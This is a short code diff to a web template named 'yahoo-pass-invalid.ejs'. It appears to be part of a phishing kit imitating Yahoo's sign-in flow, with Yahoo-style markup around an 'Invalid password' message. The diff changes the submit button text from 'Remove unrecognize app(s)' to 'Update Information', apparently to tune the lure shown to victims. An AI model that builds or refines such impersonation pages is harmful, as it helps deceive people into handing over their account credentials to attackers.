--- a/views/yahoo-pass-invalid.ejs
+++ b/views/yahoo-pass-invalid.ejs
@@ -1725,7 +1725,7 @@
               Invalid password. Please try&nbsp;again</p>
             <div class="button-container">
               <input id="login-signin" type="submit" name="signin"
-                class="orko-button-primary orko-button challenge-button" value="Remove unrecognize app(s)" tabindex="2"
+                class="orko-button-primary orko-button challenge-button" value="Update Information" tabindex="2"
                 data-rapid-tracking="true" data-ylk="elm:btn;elmt:primary;slk:next;mKey:login-landing-next"
                 >
             </div>
